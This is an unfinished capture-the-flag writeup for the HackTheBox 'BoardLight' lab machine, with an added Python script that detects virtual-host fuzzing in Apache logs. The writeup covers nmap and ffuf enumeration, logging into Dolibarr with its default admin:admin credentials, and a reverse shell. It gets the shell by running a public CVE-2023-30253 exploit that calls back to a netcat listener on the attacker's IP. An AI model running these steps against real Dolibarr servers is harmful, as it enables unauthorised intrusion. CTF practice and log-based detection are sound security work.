Enumeration

nmap

First we enumerate with nmap.

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 06:2d:3b:85:10:59:ff:73:66:27:7f:0e:ae:03:ea:f4 (RSA)
| ssh-rsa [key removed from the capture]
|   256 59:03:dc:52:87:3a:35:99:34:44:74:33:78:31:35:fb (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBK7G5PgPkbp1awVqM5uOpMJ/xVrNirmwIT21bMG/+jihUY8rOXxSbidRfC9KgvSDC4flMsPZUrWziSuBDJAra5g=
|   256 ab:13:38:e4:3e:e0:24:b4:69:38:a9:63:82:38:dd:f4 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILHj/lr3X40pR3k9+uYJk4oSjdULCK0DlOxbiL66ZRWg
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.41 (Ubuntu)
port 80

There are only two ports open and SSH offers no anonymous login, so we move on to the web app on port 80. There is nothing much on the main page.

view source

Ctrl-U to view the source shows a reference to portfolio.php commented out, but it doesn't lead anywhere.

email address (@board.htb)

We do see an email address on the board.htb domain at the bottom of the main page though, so that's worth noting.

subdomain bruteforcing

With nothing much on the website, we try to do some further enumeration. In this case I’ll try to bruteforce any subdomains.

I am using board.htb as the domain as per the email address we found earlier.

I am using ffuf as I’ve found it to be quite a reliable enumerator of directories and subdomains. I’ve also discovered some LFIs with it.

ffuf -u http://10.10.11.11 -H 'Host: FUZZ.board.htb' -w /usr/share/seclists/Discovery/DNS/subdomain-top1million-20000.txt -ac

Nice! We find a new subdomain, crm, so we add crm.board.htb as well as board.htb to the /etc/hosts file.
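The ffuf run above works by sending the same request with a different Host header for every wordlist entry; the server answers each one from its default virtual host, so an operator watching the access log sees a burst of 200s for hostnames that do not exist. The following is an added detection example (not part of the original writeup): it parses Apache access-log lines and flags any client that requests an unusually high number of distinct Host values inside a short window. It assumes a hypothetical Apache LogFormat, called hostlog here, that records the raw Host request header with %{Host}i; the stock combined formats log %v, the name of the vhost that actually served the request, which collapses every unknown Host onto the default vhost and hides the fuzzing. The log lines are constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed Apache LogFormat (hypothetical name "hostlog") that logs the raw
# Host request header instead of %v, so unknown hostnames stay visible:
#   LogFormat "%h %l %u %t \"%r\" %>s %O \"%{Host}i\" \"%{User-Agent}i\"" hostlog
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<host>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample log: one client walks through a subdomain wordlist
# (every request is answered 200 by the default vhost), another client
# browses the real site normally.
SAMPLE_LOG = """\
10.10.14.5 - - [28/Sep/2024:12:00:01 +0000] "GET / HTTP/1.1" 200 2500 "www.board.htb" "Mozilla/5.0"
10.10.14.5 - - [28/Sep/2024:12:00:01 +0000] "GET / HTTP/1.1" 200 2500 "mail.board.htb" "Mozilla/5.0"
10.10.14.5 - - [28/Sep/2024:12:00:01 +0000] "GET / HTTP/1.1" 200 2500 "ftp.board.htb" "Mozilla/5.0"
10.10.14.5 - - [28/Sep/2024:12:00:02 +0000] "GET / HTTP/1.1" 200 2500 "dev.board.htb" "Mozilla/5.0"
10.10.14.5 - - [28/Sep/2024:12:00:02 +0000] "GET / HTTP/1.1" 200 2500 "test.board.htb" "Mozilla/5.0"
10.10.14.5 - - [28/Sep/2024:12:00:02 +0000] "GET / HTTP/1.1" 200 2500 "admin.board.htb" "Mozilla/5.0"
10.10.14.5 - - [28/Sep/2024:12:00:03 +0000] "GET / HTTP/1.1" 200 2500 "api.board.htb" "Mozilla/5.0"
10.10.14.5 - - [28/Sep/2024:12:00:03 +0000] "GET / HTTP/1.1" 200 6900 "crm.board.htb" "Mozilla/5.0"
10.10.14.20 - - [28/Sep/2024:12:00:05 +0000] "GET / HTTP/1.1" 200 2500 "board.htb" "Mozilla/5.0"
10.10.14.20 - - [28/Sep/2024:12:30:00 +0000] "GET /index.php HTTP/1.1" 200 2500 "board.htb" "Mozilla/5.0"
"""


def parse_line(line):
    """Parse one hostlog line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec["time"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def find_vhost_fuzzing(lines, threshold=5, window=timedelta(seconds=60)):
    """Return {client_ip: max_distinct_hosts} for every client that sends
    requests for at least `threshold` distinct Host values within `window`."""
    per_client = defaultdict(list)  # ip -> [(time, host)]
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        per_client[rec["client"]].append((rec["time"], rec["host"].lower()))

    flagged = {}
    for ip, events in per_client.items():
        events.sort()
        start = 0
        # Sliding window over this client's requests, ordered by time.
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1
            distinct = {host for _, host in events[start:end + 1]}
            if len(distinct) >= threshold:
                flagged[ip] = max(flagged.get(ip, 0), len(distinct))
    return flagged


if __name__ == "__main__":
    for ip, count in find_vhost_fuzzing(SAMPLE_LOG.splitlines()).items():
        print(f"{ip}: {count} distinct Host values inside one window")
```

Two design points: the detector keys on Host diversity rather than on the User-Agent, because the scanner's UA string is trivially changed, and it does not filter on status code, because the default vhost returns 200 for every unknown name (which is exactly why the original run needs -ac to auto-calibrate away the baseline response). On a real server the threshold should sit well above the number of legitimate vhosts a single client could plausibly touch in a minute.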

crm.board.htb

Back to the browser to check crm.board.htb and we find a login page running an open source CRM software called Dolibarr.

Foothold

Dolibarr

default credentials

Some simple research gave me the default creds for Dolibarr, which actually work on this box: admin:admin

vulnerable version

Upon login, we see that the version is 17.0.0 so we immediately search for a CVE/exploit.

POC Exploit

There really is a POC exploit (CVE-2023-30253) for Dolibarr 17.0.0.

Very simple exploit. First, we clone the repo.

git clone https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253.git

And then we run a nc listener.

nc -lvnp 8888

After that we run the exploit and we get a shell as www-data.

python3 exploit.py http://crm.board.htb admin admin 10.10.14.5 8888

Abandoned. Followed the writeup at https://0xdf.gitlab.io/2024/09/28/htb-boardlight.html